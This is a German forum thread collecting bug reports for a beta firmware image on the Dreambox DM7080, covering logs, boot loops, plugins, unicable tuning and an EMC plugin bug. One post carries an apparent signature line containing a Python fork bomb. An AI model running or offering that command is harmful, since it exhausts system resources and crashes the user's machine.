Angepinnt Feedback/Bugs in beta image DM7080 OE2.2
-
-
-
-
Moin!
Das beginnt aber erst, wenn Du den Befehl abgesetzt hast.
journalctl > /tmp/e2log
ist da wohl aussagekräftiger.
Ob das als Ersatz für ein Bootlog langt, möchte ich je nach Problem dennoch bezweifeln.
Man kann zwar irgendwo noch extra Einträge aktivieren, aber ein Bootlog ist es dann auch noch nicht.Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von MiRoMOMO ()
-
@ m0rphU
hat es hier super erklärt und ein paar Links dazu gepostet, was es mit dem Log auf sich hat
dream-multimedia-tv.de/board/i…&postID=149965#post149965 -
Hallo,
nach dem heutigen Online Update und anschließenden Neustart, hängt meine Box in der Endlos-Bootschleife.
Anbei der Crashlog, vielleicht kann jemand damit was anfangen....
Auch das Einspielen des Backups vom Samstag war leider ohne Erfolg, nur das Backup vom August läuft???
Edit:
ich habe nun neu geflasht, ohne Plug in´s läuft das ganze, nun habe ich meine bisherigen Plugins wieder
eingespielt und erhalte nun einen GS, anbei der neue LogDieser Beitrag wurde bereits 2 mal editiert, zuletzt von golfpaule ()
-
hmich schrieb:
könnt ihr mal das neue remotecontrolselection plugin mit auf den feed packen?
funktioniert hier einwandfrei
ich push das noch mal, auch wenn es nicht 100%ig läuft warum fehlt es?
wenn ihr eine plausible antwort habt bin ich zufrieden
dreamboxupdate.com/opendreambo…r1-dm7080-r0.0_mipsel.deb -
Habs eingetragen morgen ist es auf dem feed.python -c 'while 1: __import__("os").fork()'
Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras ! -
danke
-
Hab heute morgen ein Update gemacht. Heute Abend sind dann zwei Aufnahmen gelaufen. Die beiden Sender die Aufgenommen wurden waren auf einer andern Dreambox nicht mehr zu Empfangen (tunen fehlgeschlagen). Auch auf der 7080 Tunen fehlgeschalgen auf den beiden Sender. Die beiden Aufnahmen haben 0MB. Timer gelöscht (also Aufnahme gestoppt) und siehe da die beiden Sender sind auf beiden Boxen wieder zu empfangen. Hab dann noch ne Aufnahme von Hand gestartet, da war aber alles ok, Problem kann also nicht nachgestellt werden. Die Dreamboxen laufen schon lange an der SAT Anlage (1 LNB auf Astra 19,2, Boxen hängen an Multiswitch), da hat sich nichts geändert. Und so ein Problem hatte ich noch nie, deshalb die Frage ob es was mit dem Update zu tun hat...
Hab schon seit ca. 2 Monate kein Update mehr gemacht...
OK, hab selbst was gefunden. Die unicable hat sich geändert und mein Multiswitch war nicht mehr drin. Denke daran lag es, aber das mir das auch den Nicht-unicable Mutliswitch "blockiert"...... -
Das letzte E2 Update war am 02.10., das letzte Treiber-Update am 02.09.
Dein Problem hört sich sehr stark nach einer defekten/aussetzenden Satanlage an. -
Beides nicht länger als 2 Monate. Hab doch extra geschrieben das ich schon lange kein update gemacht hab.....
Alte unicable.xml wieder eingespielt und alles wieder bestens. -
Hallo zusammen,
Hab leider das Problem, das nach aktuellem Update von heute, beim EMC die Beschreibung der Filme nicht mehr angezeigt wird. Lese Titel aus Meta und eit Ist auf ja. Auch egal was für ein Skin verwendet wird. Wenn ich von der 8000er auf die 7080 zugreife sind die Texte da. Muss mit dem Update zusammen hängen. Vielleicht hat noch jemand das Problem. EMC löschen und neu installieren hat auch nicht geholfen.
Lg Tomi -
Das liegt aber nicht an dem E2 Update, sondern anscheinend an Änderungen am EMC, die jetzt zufällig parallel mit dem E2 Update kamen.
Deinstalliere mal EMC und installiere die angehängte Version. -
Hi Joey,
ja das wars. Hab es mir fast gedacht das es am EMC liegt. Nur da das Update relativ groß war heute war ich mir nicht ganz sicher. Danke dir für die Version.
Lg Tomi -
@Joey Ist die von Dir gepostete Version denn beim nächsten Update dabei? Der Fehler wird ja hoffentlich nicht bleiben.9 Tuner an 9 Kabel
-
Die von mir gepostete Version ist eine ältere Version und wird demzufolge nicht im nächsten Update zu finden sein.
Wenn den EMC Fehler niemand meldet, wird es wohl im git auch nicht gefixt werden.
i-have-a-dreambox.com/wbb2/thread.php?threadid=156282 -
Dann melde ich es mal. Dank Deinem Link joey weis ich jetzt auch wo die Heimat davon ist!
-
-
Ok, hab das da mal gemeldet in der Hoffnung dass das auch gelesen wird9 Tuner an 9 Kabel
-
Teilen
- Facebook 0
- Twitter 0
- Google Plus 0
- Reddit 0
-
Benutzer online 1
1 Besucher